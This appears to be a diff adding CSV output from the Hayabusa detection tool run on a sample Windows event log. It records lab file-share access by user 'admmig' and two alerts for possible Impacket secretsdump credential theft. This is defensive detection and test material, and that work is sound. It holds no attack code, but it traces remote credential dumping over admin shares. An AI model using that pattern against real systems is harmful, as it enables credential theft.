+2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.020 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.084 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.105 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.123 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
